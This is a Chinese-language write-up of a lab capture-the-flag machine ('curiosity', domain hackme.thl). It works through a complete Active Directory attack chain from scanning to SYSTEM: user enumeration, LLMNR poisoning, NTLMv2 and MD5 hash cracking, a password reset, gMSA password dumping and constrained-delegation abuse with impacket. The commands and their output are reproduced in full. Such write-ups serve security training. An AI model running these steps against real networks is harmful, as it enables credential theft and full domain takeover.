5.curiosity
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# fscan -h 192.168.56.8
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.56.8:88 open
192.168.56.8:135 open
192.168.56.8:139 open
192.168.56.8:445 open
[*] alive ports len is: 4
start vulscan
[*] NetInfo
[*]192.168.56.8
[->]DC
[->]192.168.56.8
[->]10.16.82.189
[->]2409:8760:1e81:10::2:8e3e
[->]2001:0:348b:fb58:49f:3950:f5ef:ad42
[*] NetBios 192.168.56.8 [+] DC:HACKME\DC
已完成 4/4
[*] 扫描结束,耗时: 2.061390421s
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# nmap -sCV 192.168.56.8
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 19:23 CST
Nmap scan report for 192.168.56.8
Host is up (0.00014s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-09 17:23:07Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.hackme.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl
| Not valid before: 2024-10-16T13:11:58
|_Not valid after: 2025-10-16T13:11:58
|_ssl-date: 2024-12-09T17:23:55+00:00; +5h59m58s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-09T17:23:55+00:00; +5h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC.hackme.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl
| Not valid before: 2024-10-16T13:11:58
|_Not valid after: 2025-10-16T13:11:58
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-09T17:23:55+00:00; +5h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC.hackme.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl
| Not valid before: 2024-10-16T13:11:58
|_Not valid after: 2025-10-16T13:11:58
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-09T17:23:55+00:00; +5h59m58s from scanner time.
| ssl-cert: Subject: commonName=DC.hackme.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl
| Not valid before: 2024-10-16T13:11:58
|_Not valid after: 2025-10-16T13:11:58
MAC Address: 08:00:27:4A:93:90 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-12-09T17:23:46
|_ start_date: 2024-12-09T17:19:49
|_clock-skew: mean: 5h59m57s, deviation: 0s, median: 5h59m57s
|_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:4a:93:90 (Oracle VirtualBox virtual NIC)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.26 seconds
2.2. smb空会话检测
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# smbmap -u anonymous -H 192.168.56.8
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
啥都没有
2.3. kerbrute爆破域内用户
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# kerbrute userenum -d hackme.thl --dc dc.hackme.thl /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 12/09/24 - Ronnie Flathers @ropnop
2024/12/09 19:28:26 > Using KDC(s):
2024/12/09 19:28:26 > dc.hackme.thl:88
2024/12/09 19:28:27 > [+] VALID USERNAME: administrator@hackme.thl
2024/12/09 19:28:28 > [+] VALID USERNAME: osama@hackme.thl
2024/12/09 19:28:29 > [+] VALID USERNAME: jdoe@hackme.thl
2024/12/09 19:28:32 > [+] VALID USERNAME: Administrator@hackme.thl
2024/12/09 19:28:42 > [+] VALID USERNAME: yogesh@hackme.thl
2024/12/09 19:29:56 > [+] VALID USERNAME: JDoe@hackme.thl
2024/12/09 19:32:25 > [+] VALID USERNAME: appolonia@hackme.thl
2024/12/09 19:32:31 > [+] VALID USERNAME: aaren@hackme.thl
将这些用户的名字提取出来
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# cat kerbrute_users.txt|cut -d ' ' -f14|awk -F '@hack' '{print $1}' > valid_users.txt
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# cat valid_users.txt
administrator
osama
jdoe
Administrator
yogesh
JDoe
appolonia
aaren
使用这些用户进行smb爆破
但是失败了
2.4. NTML中毒攻击
┌──(root㉿kali)-[~]
└─# responder -I eth0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[*] [LLMNR] Poisoned answer sent to fe80::d4db:8c8a:d91a:fba7 for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.56.8 for name SQLserver
[*] [LLMNR] Poisoned answer sent to fe80::d4db:8c8a:d91a:fba7 for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.56.8 for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.56.8 for name SQLserver
[*] [LLMNR] Poisoned answer sent to fe80::d4db:8c8a:d91a:fba7 for name SQLserver
[*] [LLMNR] Poisoned answer sent to fe80::d4db:8c8a:d91a:fba7 for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.56.8 for name SQLserver
[SMB] NTLMv2-SSP Client : fe80::d4db:8c8a:d91a:fba7
[SMB] NTLMv2-SSP Username : hackme\jdoe
[SMB] NTLMv2-SSP Hash : jdoe::hackme:a80ce2dc6617f684:E158321071759A3992DD284245EE2CAE:010100000000000000D712DE744ADB015540EDBF22DC66B3000000000200080056005A004400370001001E00570049004E002D004D00350031004200300047004100480047004D00350004003400570049004E002D004D00350031004200300047004100480047004D0035002E0056005A00440037002E004C004F00430041004C000300140056005A00440037002E004C004F00430041004C000500140056005A00440037002E004C004F00430041004C000700080000D712DE744ADB010600040002000000080030003000000000000000000000000040000086022E48DD6F8D2AB918C5A1878B26B5CABA662847271EF44BE523D72A543E120A0010000000000000000000000000000000000009001C0063006900660073002F00530051004C00730065007200760065007200000000000000000000000000
[+] Exiting...
爆破hash
hashcat -a 0 -m 5600 ntlmv2.txt /usr/share/wordlists/seclists/Passwords/seasons.txt
JDOE::hackme:a80ce2dc6617f684:e158321071759a3992dd284245ee2cae:010100000000000000d712de744adb015540edbf22dc66b3000000000200080056005a004400370001001e00570049004e002d004d00350031004200300047004100480047004d00350004003400570049004e002d004d00350031004200300047004100480047004d0035002e0056005a00440037002e004c004f00430041004c000300140056005a00440037002e004c004f00430041004c000500140056005a00440037002e004c004f00430041004c000700080000d712de744adb010600040002000000080030003000000000000000000000000040000086022e48dd6f8d2ab918c5a1878b26b5caba662847271ef44be523d72a543e120a0010000000000000000000000000000000000009001c0063006900660073002f00530051004c00730065007200760065007200000000000000000000000000:$pr1ng@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: JDOE::hackme:a80ce2dc6617f684:e158321071759a3992dd2...000000
Time.Started.....: Mon Dec 9 20:12:40 2024 (0 secs)
Time.Estimated...: Mon Dec 9 20:12:40 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/seclists/Passwords/seasons.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1879.6 kH/s (0.85ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/5390 (75.99%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/5390 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $pr1ng -> W1NT3R2021@
Hardware.Mon.#1..: Util: 15%
成功获取密码 $pr1ng@
2.5. winrm连接
利用winrm连接上来-
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# evil-winrm -i 192.168.56.8 -u JDOE -p '$pr1ng@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jdoe\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
看了一下权限 没有啥可以直接利用的
3. 提权
3.1. bloodhound分析域内环境
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# netexec ldap 192.168.56.8 -u 'jdoe' -p '$pr1ng@' --bloodhound --collection All --dns-server 192.168.56.8
SMB 192.168.56.8 445 DC [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC) (domain:hackme.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.8 389 DC [+] hackme.thl\jdoe:$pr1ng@
LDAP 192.168.56.8 389 DC Resolved collection methods: dcom, container, group, trusts, session, acl, rdp, objectprops, psremote, localadmin
LDAP 192.168.56.8 389 DC Done in 00M 11S
LDAP 192.168.56.8 389 DC Compressing output into /root/.nxc/logs/DC_192.168.56.8_2024-12-10_023006_bloodhound.zip
可以发现 jdoe 用户是 IT ADMIN 组的成员,而该组的成功可以修改 DBA_ADM 用户的密码
但是 dba_adm 用户并没有特别的权限。但根据名字大概可以推断出其具有数据库管理员的权限
3.2. 修改 DBA_ADM 用户密码
使用 impacket-changepasswd 修改密码
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# impacket-changepasswd hackme.thl/'dba_adm'@192.168.56.8 -newpass 'admin!@#45' -altuser 'jdoe' -altpass '$pr1ng@' -no-pass -reset
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Setting the password of hackme.thl\dba_adm as hackme.thl\jdoe
[*] Connecting to DCE/RPC as hackme.thl\jdoe
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
测试一下能不能winrm上去
┌──(root㉿kali)-[/home/kali/thl/curiosity]
└─# evil-winrm -i 192.168.56.8 -u dba_adm -p 'admin!@#45'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\dba_adm\Documents>
可以发现是存在数据库服务的
获取一下数据库服务名称
*Evil-WinRM* PS C:\Users\dba_adm\Documents> reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL
SQLEXPRESS REG_SZ MSSQL15.SQLEXPRESS
名称是 SQLEXPRESS 但完整名称是 DC\SQLEXPRESS
3.3. sqlcmd获取数据库内容
*Evil-WinRM* PS C:\Users\dba_adm\Documents> sqlcmd -E -S 'DC\SQLEXPRESS' -Q 'select @@version;'
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2016 Datacenter 10.0 <X64> (Build 14393: ) (Hypervisor)
(1 rows affected)
*Evil-WinRM* PS C:\Users\dba_adm\Documents> sqlcmd -E -S 'DC\SQLEXPRESS' -Q 'SELECT name FROM master.dbo.sysdatabases;'
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CredentialsDB
(5 rows affected)
里面发现五个数据库 其中有一个十分可能有价值的数据库 CredentialsDB
获取里面的内容
*Evil-WinRM* PS C:\Users\dba_adm\Documents> sqlcmd -E -S DC\SQLEXPRESS -d CredentialsDB -Q "SELECT * FROM dbo.Credentials;"
ID Username Password
----------- -------------------------------------------------- ----------------------------------------------------------------------------------------------------
1 sqlsvc 23012244084524e51305f015727b890b
(1 rows affected)
3.4. 解密hash
23012244084524e51305f015727b890b:P@ssword1234!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 23012244084524e51305f015727b890b
Time.Started.....: Mon Dec 09 21:54:01 2024 (0 secs)
Time.Estimated...: Mon Dec 09 21:54:01 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 101.5 MH/s (1.83ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Speed.#2.........: 0 H/s (7.72ms) @ Accel:128 Loops:1 Thr:64 Vec:1
Speed.#*.........: 101.5 MH/s
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 1572864/14344387 (10.97%)
Rejected.........: 0/1572864 (0.00%)
Restore.Point....: 0/14344387 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.#2...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> lindarox
Candidates.#2....: lindarous -> efesio
Hardware.Mon.#1..: Temp: 40c Util: 9% Core:1890MHz Mem:8000MHz Bus:8
Hardware.Mon.#2..: N/A
Started: Mon Dec 09 21:53:56 2024
Stopped: Mon Dec 09 21:54:03 2024
爆破出来密码是 P@ssword1234!
winrm连接上去 sqlsvc P@ssword1234!
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
3.5. 分析SQLSVC用户权限
可以发现 SQLSVC 用户是 GMSA_USERS 用户组的成员,而改组的成员可以获取 机器 GMSA_SVC$ 的密码
获取 GMSA_SVC$ 的密码
┌──(root㉿kali)-[~]
└─# nxc ldap 192.168.56.8 -u 'sqlsvc' -p 'P@ssword1234!' --gmsa
SMB 192.168.56.8 445 DC [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC) (domain:hackme.thl) (signing:True) (SMBv1:False)
LDAPS 192.168.56.8 636 DC [+] hackme.thl\sqlsvc:P@ssword1234!
LDAPS 192.168.56.8 636 DC [*] Getting GMSA Passwords
LDAPS 192.168.56.8 636 DC Account: GMSA_SVC$ NTLM: b7a596258a854cdcf1d44d42d877c3bb
4. 约束性委派
4.1. 在分析机器GMSA_SVC$的权限
可以看到我们当前机器对DC具有
AllowedToAct权限。即约束性委派
我们使用域账户hackme.thl/GMSA_SVC$伪装为域管理员administrator,并获取目标服务cifs/dc.hackme.thl的服务票据(TGS),然后通过服务票据滥用,实现对目标服务的访问权限
┌──(root㉿kali)-[~]
└─# impacket-getST -spn cifs/dc.hackme.thl -impersonate administrator -dc-ip 192.168.56.8 'hackme.thl/GMSA_SVC$' -hashes ':b7a596258a854cdcf1d44d42d877c3bb' -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
但是我们这里出错了,原因是时钟偏差过大(Clock skew too great)。该错误通常发生在 Kerberos 客户端与 KDC(Kerberos 认证中心)之间的时间差异超过了 Kerberos 协议的容忍范围。
使用 rdate 同步域时间
┌──(root㉿kali)-[~]
└─# rdate -n 192.168.56.8
Tue Dec 10 05:17:34 CST 2024
┌──(root㉿kali)-[~]
└─# impacket-getST -spn cifs/dc.hackme.thl -impersonate administrator -dc-ip 192.168.56.8 'hackme.thl/GMSA_SVC$' -hashes ':b7a596258a854cdcf1d44d42d877c3bb' -no-pass
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_dc.hackme.thl@HACKME.THL.ccache
这样我们就获取到服务器管理员的服务票据(TGS)了
将票据导入环境变量
export KRB5CCNAME=/root/administrator@cifs_dc.hackme.thl@HACKME.THL.ccache
注意 这里需要写票据的绝对路径
然后利用 impacket-psexec 进行3.PTH
┌──(root㉿kali)-[~]
└─# impacket-psexec HACKME.THL/administrator@dc.hackme.thl -k -target-ip 192.168.56.8
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on 192.168.56.8.....
[*] Found writable share ADMIN$
[*] Uploading file WroTUHgi.exe
[*] Opening SVCManager on 192.168.56.8.....
[*] Creating service fwyV on 192.168.56.8.....
[*] Starting service fwyV.....
[!] Press help for extra shell commands Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami nt authority\system
c:\Users> type c:\users\Administrator\desktop\root.txt 24aff662fbb2ce2ecbf85daa79a396d9
c:\Users> type jdoe\desktop\user.txt bd548d24899423996c68a1a2e1e6bad